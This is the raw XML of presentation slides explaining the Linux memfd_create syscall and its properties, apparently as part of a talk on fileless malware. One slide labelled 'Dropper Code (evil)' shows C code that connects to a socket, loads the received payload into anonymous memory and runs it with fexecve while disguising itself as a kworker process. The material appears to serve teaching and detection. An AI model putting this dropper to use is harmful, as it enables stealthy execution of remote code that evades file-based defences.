              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>) Example </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Stuart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1001434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7"/>
            <a:ext cx="8496944" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>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rPr>
              <a:t>memfd_create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is to provide an easy way to get a file-descriptor for anonymous memory, without requiring a local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tmpfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> mount-point. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> takes 2 parameters, a name and a bunch of flags.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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int</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 </a:t>
            </a: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memfd_create</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a:t>
            </a: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const</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 char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>name</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 unsigned </a:t>
            </a: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int</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>flags</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a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50000"/>
                </a:schemeClr>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13</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>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rPr>
              <a:t>memfd_create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>David Herrmann</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="449070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8" y="2675467"/>
            <a:ext cx="8568951" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>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rPr>
              <a:t>memfd_create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does not require a local mount-point. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>It can create objects that are not associated with any filesystem and can never be linked into a filesystem. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The backing memory is anonymous memory as if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malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(3)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>had returned a file-descriptor instead of a pointer. </a:t>
            </a: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14</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Property 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>David Herrmann</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1052300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There are no name-clashes and no global registry. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>You can create multiple files with the same name and they will all be separate, independent files. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Therefore, the name is purely for debugging purposes so it can be detected in task-dumps or the like.</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15</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Property 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>David Herrmann</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="607388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endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="4000"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16</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301983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1" y="1916832"/>
            <a:ext cx="8640960" cy="4680520"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> main (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, char **</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, s; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  unsigned long </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = 0x0100007f11110002; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[2]= {"[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kworker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/u!0]", NULL}; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[1024]; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  // Connect </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  if ((s = socket (PF_INET, SOCK_STREAM, IPPROTO_TCP)) &lt; 0) exit (1); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  if (connect (s, (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sockaddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>*)&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 16) &lt; 0) exit (1); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  if ((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>memfd_create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("a", MFD_CLOEXEC)) &lt; 0) exit (1); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  while (1) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  { </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    if ((read (s, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 1024) ) &lt;= 0) break; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      write (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 1024); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  } </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  close (s); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fexecve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, environ) &lt; 0) exit (1); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  return 0; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> }</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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17</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="338328"/>
            <a:ext cx="8568952" cy="1252728"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Dropper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Code (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>) Excerpt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>M0rk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-2500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2" y="1412776"/>
            <a:ext cx="2667000" cy="94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176" y="5157192"/>
